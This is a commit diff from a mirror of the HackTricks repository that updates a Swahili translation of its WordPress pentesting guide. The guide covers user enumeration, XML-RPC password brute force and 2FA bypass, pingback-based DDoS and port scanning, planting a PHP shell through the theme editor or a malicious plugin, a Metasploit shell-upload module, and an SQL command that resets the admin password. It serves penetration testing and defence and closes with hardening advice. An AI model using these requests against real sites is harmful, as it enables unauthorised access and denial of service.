Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-web/wordpress.md'] t

Browse source
This commit is contained in:
Translator 2024-08-17 12:51:12 +00:00
parent 65eca89246
commit f2a6cf2642
1 changed files with 82 additions and 43 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

125
network-services-pentesting/pentesting-web/wordpress.md
View file

@ -1,8 +1,8 @@
# Wordpress
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -14,12 +14,11 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
@ -27,12 +26,12 @@ Get Access Today:
## Basic Information
**Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**Files za mandhari zinaweza kupatikana katika /wp-content/themes/,** hivyo ikiwa unabadilisha baadhi ya php ya mandhari kupata RCE huenda utatumia njia hiyo. Kwa mfano: Kutumia **mandhari twentytwelve** unaweza **kufikia** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**URL nyingine muhimu inaweza kuwa:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
**Themes files can be found in /wp-content/themes/,** hivyo ikiwa unabadilisha baadhi ya php ya mandhari kupata RCE huenda ukatumia njia hiyo. Kwa mfano: Kutumia **theme twentytwelve** unaweza **access** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
Katika **wp-config.php** unaweza kupata nenosiri la mzizi la database.
Njia za kuingia za kawaida za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
Njia za kuingia za default za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
### **Main WordPress Files**
@ -47,20 +46,20 @@ Njia za kuingia za kawaida za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin
* `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachowezesha data kuhamasishwa kwa HTTP ikifanya kama njia ya usafirishaji na XML kama njia ya usimbuaji. Aina hii ya mawasiliano imebadilishwa na [REST API](https://developer.wordpress.org/rest-api/reference) ya WordPress.
* Folda ya `wp-content` ndiyo directory kuu ambapo plugins na mandhari zinahifadhiwa.
* `wp-content/uploads/` Ni directory ambapo faili zozote zilizopakiwa kwenye jukwaa zinahifadhiwa.
* `wp-includes/` Hii ni directory ambapo faili za msingi zinahifadhiwa, kama vyeti, fonti, faili za JavaScript, na vidude.
* `wp-includes/` Hii ni directory ambapo faili za msingi zinahifadhiwa, kama vyeti, fonti, faili za JavaScript, na widgets.
* `wp-sitemap.xml` Katika toleo la WordPress 5.5 na zaidi, WordPress inazalisha faili ya ramani ya XML yenye machapisho yote ya umma na aina za machapisho zinazoweza kuulizwa kwa umma na taxonomies.
**Post exploitation**
* Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuungana na database kama jina la database, mwenyeji wa database, jina la mtumiaji na nenosiri, funguo za uthibitishaji na chumvi, na kiambatisho cha meza ya database. Faili hii ya usanidi pia inaweza kutumika kuanzisha hali ya DEBUG, ambayo inaweza kuwa na manufaa katika kutatua matatizo.
* Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuungana na database kama jina la database, mwenyeji wa database, jina la mtumiaji na nenosiri, funguo za uthibitishaji na chumvi, na kiambatisho cha jedwali la database. Faili hii ya usanidi pia inaweza kutumika kuanzisha hali ya DEBUG, ambayo inaweza kuwa na manufaa katika kutatua matatizo.
### Users Permissions
* **Msimamizi**
* **Mhariri**: Chapisha na simamia machapisho yake na ya wengine
* **Mwandishi**: Chapisha na simamia machapisho yake mwenyewe
* **Mchangiaji**: Andika na simamia machapisho yake lakini hawezi kuyachapisha
* **Mwanachama**: Angalia machapisho na hariri wasifu wao
* **Administrator**
* **Editor**: Chapisha na simamia machapisho yake na ya wengine
* **Author**: Chapisha na simamia machapisho yake mwenyewe
* **Contributor**: Andika na simamia machapisho yake lakini hawezi kuyachapisha
* **Subscriber**: Angalia machapisho na hariri wasifu wao
## **Passive Enumeration**
@ -68,7 +67,7 @@ Njia za kuingia za kawaida za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin
Angalia ikiwa unaweza kupata faili `/license.txt` au `/readme.html`
Ndani ya **kanuni ya chanzo** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
* grep
```bash
@ -78,11 +77,11 @@ curl https://victim.com/ | grep 'content="WordPress'
![](<../../.gitbook/assets/image (1111).png>)
* Failia za kiungo za CSS
* CSS link files
![](<../../.gitbook/assets/image (533).png>)
* Failia za JavaScript
* JavaScript files
![](<../../.gitbook/assets/image (524).png>)
@ -112,7 +111,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) kujenga na **kujiendesha** kazi kwa urahisi kwa kutumia zana za jamii **zilizoendelea zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) kujenga na **kujiendesha** kazi kwa urahisi zinazotolewa na zana za jamii **za kisasa zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
@ -127,11 +126,11 @@ Huenda usiweze kupata Plugins na Mandhari zote zinazowezekana. Ili kugundua zote
**ID Brute**
Unapata watumiaji halali kutoka kwa tovuti ya WordPress kwa kufanya Brute Force kwa IDs za watumiaji:
Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa kufanya Brute Force kwa IDs za watumiaji:
```
curl -s -I -X GET http://blog.example.com/?author=1
```
Ikiwa majibu ni **200** au **30X**, hiyo inamaanisha kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
Ikiwa majibu ni **200** au **30X**, hiyo inamaanisha kwamba id ni **halali**. Ikiwa jibu ni **400**, basi id ni **isiyo halali**.
**wp-json**
@ -143,7 +142,7 @@ Mwingine `/wp-json/` kiunganishi ambacho kinaweza kufichua habari kuhusu watumia
```
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
Note that this endpoint only exposes users that have made a post. **Taarifa pekee kuhusu watumiaji ambao wana kipengele hiki kimewezeshwa itatolewa**.
Note that this endpoint only exposes users that have made a post. **Taarifa tu kuhusu watumiaji ambao wana kipengele hiki kimewezeshwa zitapatikana**.
Also note that **/wp-json/wp/v2/pages** could leak IP addresses.
@ -178,13 +177,13 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
</params>
</methodCall>
```
Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya jibu la msimbo 200 unapaswa kuonekana ikiwa akreditivu si sahihi.
Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya jibu la msimbo 200 unapaswa kuonekana ikiwa akidi haziko sahihi.
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../.gitbook/assets/image (721).png>)
Kwa kutumia akreditivu sahihi unaweza kupakia faili. Katika jibu, njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
Kwa kutumia akidi sahihi unaweza kupakia faili. Katika jibu, njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
@ -214,17 +213,17 @@ Kwa kutumia akreditivu sahihi unaweza kupakia faili. Katika jibu, njia itaonekan
</params>
</methodCall>
```
Pia kuna njia **ya haraka** ya kujaribu nguvu credentials kwa kutumia **`system.multicall`** kwani unaweza kujaribu credentials kadhaa kwenye ombi moja:
Pia kuna njia **ya haraka** ya kujaribu nguvu za kuingia kwa kutumia **`system.multicall`** kwani unaweza kujaribu akrediti kadhaa kwenye ombi moja:
<figure><img src="../../.gitbook/assets/image (628).png" alt=""><figcaption></figcaption></figure>
**Kupita 2FA**
**Pita 2FA**
Njia hii inakusudiwa kwa programu na sio kwa wanadamu, na ni ya zamani, kwa hivyo haiungi mkono 2FA. Hivyo, ikiwa una creds halali lakini mlango mkuu umewekwa na 2FA, **unaweza kuwa na uwezo wa kutumia xmlrpc.php kuingia na creds hizo ukipita 2FA**. Kumbuka kwamba huwezi kufanya vitendo vyote unavyoweza kufanya kupitia console, lakini huenda bado ukawa na uwezo wa kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
Njia hii inakusudiwa kwa programu na si kwa wanadamu, na ni ya zamani, kwa hivyo haipati 2FA. Hivyo, ikiwa una akrediti halali lakini mlango mkuu umehifadhiwa na 2FA, **unaweza kuweza kutumia xmlrpc.php kuingia na akrediti hizo ukipita 2FA**. Kumbuka kwamba huwezi kufanya vitendo vyote unavyoweza kufanya kupitia console, lakini huenda bado ukaweza kufikia RCE kama Ippsec anavyoeleza katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
**DDoS au skanning ya port**
Ikiwa unaweza kupata njia _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa mwenyeji/port yoyote.\
Ikiwa unaweza kupata njia _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi la kiholela kwa mwenyeji/port yoyote.\
Hii inaweza kutumika kuomba **maelfu** ya **tovuti** za Wordpress **kuingia** kwenye **mahali** moja (hivyo **DDoS** inasababishwa katika mahali hapo) au unaweza kuitumia kufanya **Wordpress** i **scan** baadhi ya **mtandao** wa ndani (unaweza kuashiria port yoyote).
```markup
<methodCall>
@ -239,7 +238,7 @@ Hii inaweza kutumika kuomba **maelfu** ya **tovuti** za Wordpress **kuingia** kw
Ikiwa unapata **faultCode** yenye thamani **kubwa** kuliko **0** (17), inamaanisha kwamba bandari iko wazi.
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita kujifunza jinsi ya kutumia mbinu hii kusababisha DDoS.
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza jinsi ya kutumia mbinu hii kusababisha DDoS.
**DDoS**
```markup
@ -284,21 +283,21 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) kujenga na **kujiendesha** kwa urahisi kazi zinazotolewa na zana za jamii **za kisasa zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) kujenga na **kujiendesha** kwa urahisi kazi zinazotolewa na zana za jamii **za kisasa zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
## Pata ufikiaji kwa kubadilisha kidogo
Zaidi ya shambulio halisi, hii ni udadisi. Kwenye CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kubadilisha bit 1 kutoka faili yoyote ya wordpress. Hivyo unaweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili NOP operesheni ya NOT (`!`).
Zaidi ya shambulio halisi, hii ni udadisi. Kwenye CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kubadilisha bit 1 kutoka kwa faili yoyote ya wordpress. Hivyo unaweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili NOP operesheni ya NOT (`!`).
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
## **Panel RCE**
**Kubadilisha php kutoka kwa mandhari iliyotumika (nywila za admin zinahitajika)**
**Kubadilisha php kutoka kwa mandhari inayotumika (nywila za admin zinahitajika)**
Muonekano → Mhariri wa Mandhari → Kiolezo cha 404 (kushoto)
@ -306,11 +305,11 @@ Badilisha maudhui kuwa php shell:
![](<../../.gitbook/assets/image (384).png>)
Tafuta mtandaoni jinsi ya kufikia ukurasa huo ulio sasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
Tafuta mtandaoni jinsi ya kufikia ukurasa huo ulio sasishwa. Katika kesi hii, unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
### MSF
You can use:
Unaweza kutumia:
```
use exploit/unix/webapp/wp_admin_shell_upload
```
@ -357,9 +356,9 @@ Njia hii inahusisha ufungaji wa plugin mbaya inayojulikana kuwa na udhaifu na in
4. **Exploitation**:
* Ikiwa plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa na udhaifu.
* Mfumo wa Metasploit unatoa exploit kwa udhaifu huu. Kwa kupakia moduli inayofaa na kutekeleza amri maalum, kikao cha meterpreter kinaweza kuanzishwa, kikitoa ufikiaji usioidhinishwa kwenye tovuti.
* Inabainishwa kuwa hii ni moja tu ya njia nyingi za kutumia udhaifu kwenye tovuti ya WordPress.
* Inabainishwa kuwa hii ni moja tu ya njia nyingi za kutumia udhaifu wa tovuti ya WordPress.
Maudhui yanajumuisha msaada wa kuona unaoonyesha hatua katika dashibodi ya WordPress kwa ufungaji na uhamasishaji wa plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni haramu na isiyo ya maadili bila idhini sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama vile pentesting kwa ruhusa wazi.
Maudhui yanajumuisha msaada wa kuona unaoonyesha hatua katika dashibodi ya WordPress kwa ufungaji na uhamasishaji wa plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni haramu na isiyo ya maadili bila idhini sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama vile pentesting kwa idhini wazi.
**Kwa hatua za kina zaidi angalia:** [**https://www.hackingarticles.in/wordpress-reverse-shell/\*\***](https://www.hackingarticles.in/wordpress-reverse-shell/)
@ -373,6 +372,47 @@ Badilisha nenosiri la admin:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
## Wordpress Plugins Pentest
### Attack Surface
Kujua jinsi plugin ya Wordpress inavyoweza kufichua kazi ni muhimu ili kupata udhaifu katika kazi zake. Unaweza kupata jinsi plugin inaweza kufichua kazi katika alama zifuatazo na baadhi ya mifano ya plugins zenye udhaifu katika [**hiki kipande cha blog**](https://nowotarski.info/wordpress-nonce-authorization/).
* **`wp_ajax`**&#x20;
Moja ya njia ambazo plugin inaweza kufichua kazi kwa watumiaji ni kupitia waandishi wa AJAX. Hizi zinaweza kuwa na mantiki, udhibiti, au makosa ya uthibitishaji. Aidha, ni kawaida kwamba kazi hizi zitategemea uthibitishaji na ruhusa katika uwepo wa nonce ya wordpress ambayo **mtumiaji yeyote aliyeidhinishwa katika mfano wa Wordpress anaweza kuwa nayo** (bila kujali nafasi yake).
Hizi ndizo kazi ambazo zinaweza kutumika kufichua kazi katika plugin:
```php
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
```
**Matumizi ya `nopriv` yanaufanya mwisho uweze kupatikana na watumiaji wowote (hata wale wasio na uthibitisho).**
{% hint style="danger" %}
Zaidi ya hayo, ikiwa kazi inachunguza tu uthibitisho wa mtumiaji kwa kutumia kazi `wp_verify_nonce`, kazi hii inachunguza tu kama mtumiaji ameingia, kawaida haiangalii nafasi ya mtumiaji. Hivyo, watumiaji wenye mamlaka ya chini wanaweza kuwa na ufikiaji wa vitendo vya mamlaka ya juu.
{% endhint %}
* **REST API**
Pia inawezekana kufichua kazi kutoka wordpress kwa kujiandikisha rest AP kwa kutumia kazi `register_rest_route`:
```php
register_rest_route(
$this->namespace, '/get/', array(
'methods' => WP_REST_Server::READABLE,
'callback' => array($this, 'getData'),
'permission_callback' => '__return_true'
)
);
```
The `permission_callback` ni callback kwa kazi inayokagua kama mtumiaji aliyepewa ruhusa kuita njia ya API.
**Ikiwa kazi ya ndani `__return_true` inatumika, itakosa tu kukagua ruhusa za mtumiaji.**
* **Upatikanaji wa moja kwa moja wa faili ya php**
Kwa kweli, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kutoka mtandao. Hivyo, ikiwa plugin inatoa kazi yoyote dhaifu inayoweza kuanzishwa kwa kuingia tu kwenye faili, itakuwa rahisi kutumiwa na mtumiaji yeyote.
## Ulinzi wa WordPress
### Sasisho za Kawaida
@ -383,7 +423,7 @@ define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```
pia, **sakinisha tu plugins na mandhari za WordPress zinazoweza kuaminika**.
Pia, **sakinisha tu plugins na mandhari za WordPress zinazoweza kuaminika**.
### Plugins za Usalama
@ -395,20 +435,21 @@ pia, **sakinisha tu plugins na mandhari za WordPress zinazoweza kuaminika**.
* Ondoa mtumiaji wa **admin** wa kawaida
* Tumia **nywila zenye nguvu** na **2FA**
* Kila wakati **kagua** ruhusa za watumiaji
* Mara kwa mara **kagua** ruhusa za watumiaji
* **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force
* Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani fulani za IP.
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) kujenga na **kujiendesha** kwa urahisi kazi zinazotumiwa na zana za jamii **za kisasa zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) kujenga na **kujiendesha kiotomatiki** kwa urahisi kwa kutumia zana za jamii **zilizoendelea zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -416,9 +457,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" al
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
</details>
{% endhint %}